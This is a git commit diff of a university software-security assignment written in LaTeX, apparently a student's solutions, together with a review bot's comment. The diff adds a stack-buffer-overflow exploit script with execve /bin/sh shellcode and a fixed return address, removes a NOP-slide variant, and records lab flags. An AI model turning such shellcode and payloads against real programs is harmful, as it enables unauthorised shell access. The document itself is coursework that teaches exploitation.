[Assignment-6] Addendum to Task 6
All checks were successful
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (push) Successful in 49s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (push) Successful in 47s
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (pull_request) Successful in 22s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (pull_request) Successful in 6s
This commit is contained in:
parent
61c2d83c03
commit
459d71216a
1 changed files with 6 additions and 21 deletions
|
@ -139,38 +139,23 @@
|
||||||
|
|
||||||
\begin{exercise}[Stack-Based Buffer Overflow]{6}
|
\begin{exercise}[Stack-Based Buffer Overflow]{6}
|
||||||
\begin{subexercises}
|
\begin{subexercises}
|
||||||
\item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell ausgeführt wird:\\
|
\item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell ausgeführt wird. Die Flag lautet \lstinline|flag{THAT_WAS_EASY_HUH}|.\\
|
||||||
\begin{lstlisting}[language=Bash]
|
\begin{lstlisting}[language=Bash]
|
||||||
#!/usr/bin/env sh
|
#!/usr/bin/env sh
|
||||||
|
|
||||||
# 28 Byte Shellcode
|
# 21 Byte Shellcode
|
||||||
SHELLCODE="\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
|
SHELLCODE="\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
|
||||||
# Padding to fill:
|
# Padding to fill:
|
||||||
# - 72 Bytes to fill buff
|
# - 79 Bytes to fill buff
|
||||||
# - 8 Bytes to fill the local variables before buff
|
# - 8 Bytes to fill the local variables before buff
|
||||||
# - 4 Bytes to fill the saved ebp value
|
# - 4 Bytes to fill the saved ebp value
|
||||||
PADDING=$(printf "A%.0s" $(seq 1 84))
|
PADDING=$(printf "A%.0s" $(seq 1 91))
|
||||||
# Address of the start of the buff array / shellcode
|
# Address of the start of the buff array / shellcode
|
||||||
RETADDR="\x1C\xDB\xFF\xFF"
|
RETADDR="\x1C\xDB\xFF\xFF"
|
||||||
|
|
||||||
printf $SHELLCODE$PADDING$RETADDR
|
printf $SHELLCODE$PADDING$RETADDR
|
||||||
\end{lstlisting}
|
\end{lstlisting}
|
||||||
\item Mit dem folgenden Script wird eine Eingabe für das Programm generiert, sodass eine Shell im Anschluss an eine NOP-Slide ausgeführt wird.:\\
|
\item Die Flag lautet \lstinline|flag{THEY_SEE_ME_SLIDIN_THEY_HATIN}|.\\
|
||||||
\begin{lstlisting}[language=Bash]
|
|
||||||
#!/usr/bin/env sh
|
|
||||||
|
|
||||||
# 28 Byte Shellcode
|
|
||||||
SHELLCODE="\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
|
|
||||||
# NOP-Slide to fill:
|
|
||||||
# - 72 Bytes to fill buff
|
|
||||||
# - 8 Bytes to fill the local variables before buff
|
|
||||||
# - 4 Bytes to fill the saved ebp value
|
|
||||||
PADDING=$(printf "\\\\0x90%.0s" $(seq 1 84))
|
|
||||||
# Address of the start of the buff array / shellcode
|
|
||||||
RETADDR="\x1C\xDB\xFF\xFF"
|
|
||||||
|
|
||||||
printf $PADDING$SHELLCODE$RETADDR
|
|
||||||
\end{lstlisting}
|
|
||||||
\end{subexercises}
|
\end{subexercises}
|
||||||
\end{exercise}
|
\end{exercise}
|
||||||
\end{document}
|
\end{document}
|
||||||
|
|
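Review bot: In the second \item the whole listing is removed and only the flag remains, so the NOP-slide subexercise no longer documents how its input was generated, and the trailing `\\` after the flag now has no following line to break to. If the intent is that the script from the first subexercise is reused, say so in one sentence; otherwise restore a corrected listing, and drop the `\\` either way. In the first listing, the updated comment "79 Bytes to fill buff" would be more accurate as the remaining bytes of buff after the 21-byte shellcode, since the shellcode itself sits at the start of buff and the 91 padding bytes are the sum 79 + 8 + 4.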